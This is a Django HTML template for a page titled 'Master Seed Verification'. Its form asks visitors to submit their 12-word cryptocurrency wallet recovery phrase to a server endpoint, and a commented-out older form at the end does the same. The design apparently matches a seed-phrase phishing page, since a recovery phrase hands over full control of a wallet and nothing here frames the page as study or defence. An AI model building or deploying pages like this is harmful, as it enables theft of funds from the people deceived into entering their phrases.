{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <!-- Favicon -->
     <link rel="icon" type="image/x-icon" href="{% static 'assets/img/favicon/favicon.ico' %}" />
    <title>12-Phrase Word Request</title>
    <!-- Bootstrap CSS -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #111;
            color: #fff;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        .container {
            max-width: 500px;
            margin: 100px auto;
            background-color: #222;
            padding: 30px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0,0,0,0.5);
        }
        h2 {
            text-align: center;
            color: rgb(81, 192, 81);
            margin-bottom: 30px;
        }
        label {
            font-size: 18px;
            color: #fff;
        }
        textarea {
            width: 100%;
            height: 150px;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #666;
            border-radius: 5px;
            resize: none;
            background-color: #333;
            color: #fff;
        }
        .btn-primary {
            background-color: rgb(25, 63, 25);
            border: none;
            width: 100%;
        }
        .btn-primary:hover {
            background-color: rgb(17, 131, 17);
        }
        .form-text {
            font-size: 14px;
            color: #999;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>Master Seed Verification</h2>
        <form method="post" action="{% url 'userphrase-page' %}">
            <div class="form-group">
                {% csrf_token %}
                {{ form.as_p }}
                {% if form.errors %}
                    <div class="alert alert-danger">
                        {{ form.errors }}
                    </div>
                {% endif %}
                <small class="form-text">Please make sure to enter the correct 12-word recovery phrase.</small>
                <button type="submit" class="btn btn-primary mt-3">Verify</button>
            </div>
        </form>
    </div>

    <!-- Bootstrap JS and dependencies -->
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</body>
</html>

<!-- <form>
    <div class="form-group">
        <label for="mnemonic">Enter your 12-word recovery phrase:</label>
        <textarea class="form-control" id="mnemonic" rows="3" placeholder="Enter your 12-word recovery phrase" required></textarea>
        <small class="form-text">Please make sure to enter the correct 12-word recovery phrase.</small>
    </div>
    <button type="submit" class="btn btn-primary mt-3">Verify</button>
</form> -->

